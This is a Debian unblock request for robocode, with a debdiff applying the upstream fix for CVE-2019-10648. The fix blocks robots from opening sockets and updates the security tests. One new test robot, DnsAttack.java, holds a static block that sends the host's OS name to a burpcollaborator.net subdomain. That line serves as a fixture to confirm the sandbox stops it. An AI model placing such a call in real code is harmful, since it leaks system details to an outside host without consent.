Package: release.debian.org Severity: normal User: release.debian....@packages.debian.org Usertags: unblock
Please unblock package robocode Robocode in Buster is affected by CVE-2019-10648. The fix applied cleanly and all tests pass. This is Debian bug 926088. Thank you. unblock robocode/1.9.3.3-2 -- System Information: Debian Release: buster/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: amd64 (x86_64) Kernel: Linux 4.9.0-8-amd64 (SMP w/4 CPU cores) Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: unable to detect
diff -Nru robocode-1.9.3.3/debian/changelog robocode-1.9.3.3/debian/changelog --- robocode-1.9.3.3/debian/changelog 2018-09-13 13:52:33.000000000 +0200 +++ robocode-1.9.3.3/debian/changelog 2019-04-08 00:13:19.000000000 +0200 @@ -1,3 +1,13 @@ +robocode (1.9.3.3-2) unstable; urgency=medium + + * Fix CVE-2019-10648: + Robocode allows remote attackers to cause external service interaction + (DNS), as demonstrated by a query for a unique subdomain name within an + attacker-controlled DNS zone, because of a .openStream call within + java.net.URL. (Closes: #926088) + + -- Markus Koschany <a...@debian.org> Mon, 08 Apr 2019 00:13:19 +0200 + robocode (1.9.3.3-1) unstable; urgency=medium * New upstream version 1.9.3.3. diff -Nru robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch --- robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch 1970-01-01 01:00:00.000000000 +0100 +++ robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch 2019-04-08 00:13:19.000000000 +0200 @@ -0,0 +1,235 @@ +From: Markus Koschany <a...@debian.org> +Date: Mon, 8 Apr 2019 00:11:33 +0200 +Subject: CVE-2019-10648 + +Bug-Debian: https://bugs.debian.org/926088 +Origin: https://github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bd +--- + .../host/security/RobocodeSecurityManager.java | 26 ++++++++++-- + .../src/main/java/tested/robots/DnsAttack.java | 18 +++++++++ + .../test/robots/TestConstructorHttpAttack.java | 11 +++--- + .../sf/robocode/test/robots/TestHttpAttack.java | 11 +++--- + .../robots/TestStaticConstructorDnsAttack.java | 46 ++++++++++++++++++++++ + 5 files changed, 96 insertions(+), 16 deletions(-) + create mode 100644 robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java + create mode 100644 robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java + +diff --git a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java +index bc4c85a..ebd23e9 100644 +--- a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java ++++ b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java +@@ -12,7 +12,9 @@ import net.sf.robocode.host.IHostedThread; + import net.sf.robocode.host.IThreadManager; + import net.sf.robocode.io.RobocodeProperties; + ++import java.net.SocketPermission; + import java.security.AccessControlException; ++import java.security.Permission; + + + /** +@@ -49,7 +51,6 @@ public class RobocodeSecurityManager extends SecurityManager { + } + + Thread c = Thread.currentThread(); +- + if (isSafeThread(c)) { + return; + } +@@ -84,7 +85,7 @@ public class RobocodeSecurityManager extends SecurityManager { + if (robotProxy != null) { + robotProxy.punishSecurityViolation(message); + } +- throw new AccessControlException(message); ++ throw new SecurityException(message); + } + } + +@@ -94,7 +95,6 @@ public class RobocodeSecurityManager extends SecurityManager { + return; + } + Thread c = Thread.currentThread(); +- + if (isSafeThread(c)) { + return; + } +@@ -123,9 +123,27 @@ public class RobocodeSecurityManager extends SecurityManager { + String message = "Robots are only allowed to create up to 5 threads!"; + + robotProxy.punishSecurityViolation(message); +- throw new AccessControlException(message); ++ throw new SecurityException(message); + } + } ++ ++ public void checkPermission(Permission perm) { ++ if (RobocodeProperties.isSecurityOff()) { ++ return; ++ } ++ Thread c = Thread.currentThread(); ++ if (isSafeThread(c)) { ++ return; ++ } ++ super.checkPermission(perm); ++ ++ if (perm instanceof SocketPermission) { ++ IHostedThread robotProxy = threadManager.getLoadedOrLoadingRobotProxy(c); ++ String message = "Using socket is not allowed"; ++ robotProxy.punishSecurityViolation(message); ++ throw new SecurityException(message); ++ } ++ } + + private boolean isSafeThread(Thread c) { + return threadManager.isSafeThread(c); +diff --git a/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java +new file mode 100644 +index 0000000..701e5d8 +--- /dev/null ++++ b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java +@@ -0,0 +1,18 @@ ++package tested.robots; ++ ++public class DnsAttack extends robocode.Robot { ++ static { ++ try { ++ new java.net.URL("http://" + System.getProperty("os.name").replaceAll(" ", ".") ++ + ".randomsubdomain.burpcollaborator.net").openStream(); ++ } catch (Exception e) { ++ } ++ } ++ ++ public void run() { ++ for (;;) { ++ ahead(100); ++ back(100); ++ } ++ } ++} +diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java +index 8d7b1d7..7930237 100755 +--- a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java ++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java +@@ -19,7 +19,7 @@ import robocode.control.events.TurnEndedEvent; + public class TestConstructorHttpAttack extends RobocodeTestBed { + + private boolean messagedInitialization; +- private boolean messagedAccessDenied; ++ private boolean securityExceptionOccurred; + + @Override + public String getRobotNames() { +@@ -36,20 +36,19 @@ public class TestConstructorHttpAttack extends RobocodeTestBed { + messagedInitialization = true; + } + +- if (out.contains("access denied (java.net.SocketPermission") +- || out.contains("access denied (\"java.net.SocketPermission\"")) { +- messagedAccessDenied = true; ++ if (out.contains("java.lang.SecurityException:")) { ++ securityExceptionOccurred = true; + } + } + + @Override + protected void runTeardown() { + Assert.assertTrue("Error during initialization", messagedInitialization); +- Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied); ++ Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred); + } + + @Override + protected int getExpectedErrors() { +- return hasJavaNetURLPermission ? 3 : 2; // Security error must be reported as an error ++ return 2; + } + } +diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java +index 770fb49..06d3bcb 100755 +--- a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java ++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java +@@ -18,7 +18,7 @@ import robocode.control.events.TurnEndedEvent; + */ + public class TestHttpAttack extends RobocodeTestBed { + +- private boolean messagedAccessDenied; ++ private boolean securityExceptionOccurred; + + @Override + public String getRobotNames() { +@@ -31,19 +31,18 @@ public class TestHttpAttack extends RobocodeTestBed { + + final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot(); + +- if (out.contains("access denied (java.net.SocketPermission") +- || out.contains("access denied (\"java.net.SocketPermission\"")) { +- messagedAccessDenied = true; ++ if (out.contains("java.lang.SecurityException:")) { ++ securityExceptionOccurred = true; + } + } + + @Override + protected void runTeardown() { +- Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied); ++ Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred); + } + + @Override + protected int getExpectedErrors() { +- return hasJavaNetURLPermission ? 2 : 1; // Security error must be reported as an error. Java 8 reports two errors. ++ return 1; + } + } +diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java +new file mode 100644 +index 0000000..bf62373 +--- /dev/null ++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java +@@ -0,0 +1,46 @@ ++/** ++ * Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors ++ * All rights reserved. This program and the accompanying materials ++ * are made available under the terms of the Eclipse Public License v1.0 ++ * which accompanies this distribution, and is available at ++ * https://robocode.sourceforge.io/license/epl-v10.html ++ */ ++package net.sf.robocode.test.robots; ++ ++import net.sf.robocode.test.helpers.RobocodeTestBed; ++import org.junit.Assert; ++import robocode.control.events.TurnEndedEvent; ++ ++/** ++ * @author Flemming N. Larsen (original) ++ */ ++public class TestStaticConstructorDnsAttack extends RobocodeTestBed { ++ ++ private boolean securityExceptionOccurred; ++ ++ @Override ++ public String getRobotNames() { ++ return "tested.robots.DnsAttack,sample.Target"; ++ } ++ ++ @Override ++ public void onTurnEnded(TurnEndedEvent event) { ++ super.onTurnEnded(event); ++ ++ final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot(); ++ ++ if (out.contains("SYSTEM: Using socket is not allowed")) { ++ securityExceptionOccurred = true; ++ } ++ } ++ ++ @Override ++ protected void runTeardown() { ++ Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred); ++ } ++ ++ @Override ++ protected int getExpectedErrors() { ++ return 1; ++ } ++} diff -Nru robocode-1.9.3.3/debian/patches/series robocode-1.9.3.3/debian/patches/series --- robocode-1.9.3.3/debian/patches/series 2018-09-13 13:52:33.000000000 +0200 +++ robocode-1.9.3.3/debian/patches/series 2019-04-08 00:13:19.000000000 +0200 @@ -1,3 +1,4 @@ showJavaDocumentation.patch maven-assembly.patch ecj.patch +CVE-2019-10648.patch